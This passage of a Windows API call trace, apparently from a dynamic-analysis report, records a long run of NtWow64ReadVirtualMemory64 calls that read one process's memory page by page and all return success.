[0076.762] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3eb000, Buffer=0x7ff8, BufferSize=0x25eb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.762] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ec000, Buffer=0x7ff8, BufferSize=0x25ec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.762] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ed000, Buffer=0x7ff8, BufferSize=0x25ed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.762] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ee000, Buffer=0x7ff8, BufferSize=0x25ee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.762] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ef000, Buffer=0x7ff8, BufferSize=0x25ef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.762] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f0000, Buffer=0x7ff8, BufferSize=0x25f0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.762] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f1000, Buffer=0x7ff8, BufferSize=0x25f1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.763] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f2000, Buffer=0x7ff8, BufferSize=0x25f2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.763] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f3000, Buffer=0x7ff8, BufferSize=0x25f3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.763] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f4000, Buffer=0x7ff8, BufferSize=0x25f4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.763] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f5000, Buffer=0x7ff8, BufferSize=0x25f5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.763] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f6000, Buffer=0x7ff8, BufferSize=0x25f6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.765] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f7000, Buffer=0x7ff8, BufferSize=0x25f7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.772] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f8000, Buffer=0x7ff8, BufferSize=0x25f8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.772] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f9000, Buffer=0x7ff8, BufferSize=0x25f9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.772] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3fa000, Buffer=0x7ff8, BufferSize=0x25fa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3fb000, Buffer=0x7ff8, BufferSize=0x25fb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3fc000, Buffer=0x7ff8, BufferSize=0x25fc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3fd000, Buffer=0x7ff8, BufferSize=0x25fd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3fe000, Buffer=0x7ff8, BufferSize=0x25fe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ff000, Buffer=0x7ff8, BufferSize=0x25ff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.773] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee400000, Buffer=0x7ff8, BufferSize=0x2600000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee401000, Buffer=0x7ff8, BufferSize=0x2601000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee402000, Buffer=0x7ff8, BufferSize=0x2602000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee403000, Buffer=0x7ff8, BufferSize=0x2603000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee404000, Buffer=0x7ff8, BufferSize=0x2604000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee405000, Buffer=0x7ff8, BufferSize=0x2605000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee406000, Buffer=0x7ff8, BufferSize=0x2606000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee407000, Buffer=0x7ff8, BufferSize=0x2607000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.774] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee408000, Buffer=0x7ff8, BufferSize=0x2608000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee409000, Buffer=0x7ff8, BufferSize=0x2609000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40a000, Buffer=0x7ff8, BufferSize=0x260a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40b000, Buffer=0x7ff8, BufferSize=0x260b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40c000, Buffer=0x7ff8, BufferSize=0x260c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40d000, Buffer=0x7ff8, BufferSize=0x260d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40e000, Buffer=0x7ff8, BufferSize=0x260e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.775] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee40f000, Buffer=0x7ff8, BufferSize=0x260f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.776] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee410000, Buffer=0x7ff8, BufferSize=0x2610000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.776] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee411000, Buffer=0x7ff8, BufferSize=0x2611000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.776] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee412000, Buffer=0x7ff8, BufferSize=0x2612000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.776] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee413000, Buffer=0x7ff8, BufferSize=0x2613000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.777] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee414000, Buffer=0x7ff8, BufferSize=0x2614000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.777] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee415000, Buffer=0x7ff8, BufferSize=0x2615000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.777] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee416000, Buffer=0x7ff8, BufferSize=0x2616000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.777] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee417000, Buffer=0x7ff8, BufferSize=0x2617000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.777] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee418000, Buffer=0x7ff8, BufferSize=0x2618000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.777] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee419000, Buffer=0x7ff8, BufferSize=0x2619000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.777] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41a000, Buffer=0x7ff8, BufferSize=0x261a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.777] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41b000, Buffer=0x7ff8, BufferSize=0x261b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41c000, Buffer=0x7ff8, BufferSize=0x261c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41d000, Buffer=0x7ff8, BufferSize=0x261d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41e000, Buffer=0x7ff8, BufferSize=0x261e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee41f000, Buffer=0x7ff8, BufferSize=0x261f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee420000, Buffer=0x7ff8, BufferSize=0x2620000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee421000, Buffer=0x7ff8, BufferSize=0x2621000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.778] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee422000, Buffer=0x7ff8, BufferSize=0x2622000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee423000, Buffer=0x7ff8, BufferSize=0x2623000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee424000, Buffer=0x7ff8, BufferSize=0x2624000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee425000, Buffer=0x7ff8, BufferSize=0x2625000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee426000, Buffer=0x7ff8, BufferSize=0x2626000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee427000, Buffer=0x7ff8, BufferSize=0x2627000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee428000, Buffer=0x7ff8, BufferSize=0x2628000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.779] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee429000, Buffer=0x7ff8, BufferSize=0x2629000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42a000, Buffer=0x7ff8, BufferSize=0x262a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42b000, Buffer=0x7ff8, BufferSize=0x262b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42c000, Buffer=0x7ff8, BufferSize=0x262c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42d000, Buffer=0x7ff8, BufferSize=0x262d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42e000, Buffer=0x7ff8, BufferSize=0x262e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee42f000, Buffer=0x7ff8, BufferSize=0x262f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.780] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee430000, Buffer=0x7ff8, BufferSize=0x2630000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee431000, Buffer=0x7ff8, BufferSize=0x2631000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee432000, Buffer=0x7ff8, BufferSize=0x2632000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee433000, Buffer=0x7ff8, BufferSize=0x2633000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee434000, Buffer=0x7ff8, BufferSize=0x2634000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee435000, Buffer=0x7ff8, BufferSize=0x2635000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee436000, Buffer=0x7ff8, BufferSize=0x2636000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee437000, Buffer=0x7ff8, BufferSize=0x2637000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.781] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee438000, Buffer=0x7ff8, BufferSize=0x2638000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee439000, Buffer=0x7ff8, BufferSize=0x2639000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43a000, Buffer=0x7ff8, BufferSize=0x263a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43b000, Buffer=0x7ff8, BufferSize=0x263b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43c000, Buffer=0x7ff8, BufferSize=0x263c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43d000, Buffer=0x7ff8, BufferSize=0x263d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43e000, Buffer=0x7ff8, BufferSize=0x263e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.782] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee43f000, Buffer=0x7ff8, BufferSize=0x263f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee440000, Buffer=0x7ff8, BufferSize=0x2640000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee441000, Buffer=0x7ff8, BufferSize=0x2641000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee442000, Buffer=0x7ff8, BufferSize=0x2642000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee443000, Buffer=0x7ff8, BufferSize=0x2643000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee444000, Buffer=0x7ff8, BufferSize=0x2644000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee445000, Buffer=0x7ff8, BufferSize=0x2645000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.783] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee446000, Buffer=0x7ff8, BufferSize=0x2646000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee447000, Buffer=0x7ff8, BufferSize=0x2647000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee448000, Buffer=0x7ff8, BufferSize=0x2648000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee449000, Buffer=0x7ff8, BufferSize=0x2649000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44a000, Buffer=0x7ff8, BufferSize=0x264a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44b000, Buffer=0x7ff8, BufferSize=0x264b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44c000, Buffer=0x7ff8, BufferSize=0x264c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44d000, Buffer=0x7ff8, BufferSize=0x264d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44e000, Buffer=0x7ff8, BufferSize=0x264e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee44f000, Buffer=0x7ff8, BufferSize=0x264f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee450000, Buffer=0x7ff8, BufferSize=0x2650000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee451000, Buffer=0x7ff8, BufferSize=0x2651000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee452000, Buffer=0x7ff8, BufferSize=0x2652000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee453000, Buffer=0x7ff8, BufferSize=0x2653000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee454000, Buffer=0x7ff8, BufferSize=0x2654000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee455000, Buffer=0x7ff8, BufferSize=0x2655000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee456000, Buffer=0x7ff8, BufferSize=0x2656000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee457000, Buffer=0x7ff8, BufferSize=0x2657000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee458000, Buffer=0x7ff8, BufferSize=0x2658000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee459000, Buffer=0x7ff8, BufferSize=0x2659000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45a000, Buffer=0x7ff8, BufferSize=0x265a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45b000, Buffer=0x7ff8, BufferSize=0x265b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45c000, Buffer=0x7ff8, BufferSize=0x265c000, NumberOfBytesRead=0x1000 | out: 